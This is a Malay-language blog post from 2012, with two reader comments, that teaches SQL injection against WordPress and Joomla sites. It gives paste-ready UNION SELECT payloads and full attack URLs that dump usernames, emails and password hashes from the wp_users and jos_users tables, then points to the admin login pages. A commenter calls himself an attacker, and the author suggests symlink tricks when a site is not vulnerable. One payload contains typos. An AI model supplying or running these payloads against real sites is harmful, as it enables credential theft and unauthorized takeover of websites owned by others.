Saturday, July 28, 2012

Kenali Wordpress dan joomla Untuk Sqli Injection

Salam sejahtera

Hari ni seth nak kongsi satu benda berkenaan dengan SQli yang ada di wordpress dan Joomla .
Sebenarnya banyak lagi bug yang terdapat di server Wordpress dan Joomla ini.

Contohnya : Arbitrary file Uploads , File Upload Vulnerablities , http Header Bugs . Xss .
kalau korang nak tahu . korang google satu satu keyword dekat atas .

Ok .

1:Wordpress

Seth nak terangkan Database untuk wordpress dahulu .

(Gambar Di atas adalah Database website ber"platform" Wordpress)

Sekarang kita akan berfikir logik untuk mencari username jika mengunakan SQLI .

Wp_User : Username dan password Disimpan

Contoh adalah :

Http://[localhost]/index.php?/p?=2


pada perimeter "p?=2" terdedah kepada Sqli injection . maka masukan exploit wordpress .

union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--


Maka akan Menjadi :

Http://[localhost]/index.php?/p?=-2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_ass),7,8,9+from+wp_user--


Nanti akan keluar username dan password untuk website wordpress itu tadi .

Jangan Lupa tambah : "- dan + sebelum Exploit. Rujuk warna Merah Di atas .

Htpp://[localhost]/wp_admin/ - /wp_login.php : Halaman Admin


2:Joomla

Jom kita tengok database Joomla .
(Sila Rujuk Penerangan Di Atas untuk Jomla)


Jos_Users : Username dan password Disimpan .

Http://[localhost]/index.php?option=view=saya=2


Exploit :

+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype),4,5,6,7,8,9,10+from+jos_users--


Contoh:

Http://[localhost]/index.php?option=view=saya=-2+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype),4
,5,6,7,8,9,10+from+jos_users--


Http://[localhost]/administrator : Halaman Admin

itu sahaja .

Share ok .







2 34:

Syahmi Noobies Attacker on August 9, 2012 at 12:05 AM said...

Seth nk tnye hrp jawab,
method ni berkesan ke kalau website tu tak vuln?

Seth ./ Erry on August 11, 2012 at 7:29 PM said...

Ok... kalau website tidak vuln tidak dapat . :D
kalau symlink munkin boleh

 

About

Site Info

Related Posts Plugin for WordPress, Blogger...

tutors Copyright © 2009 Community is Designed by Bie Converted To Community Galleria by Cool Tricks N Tips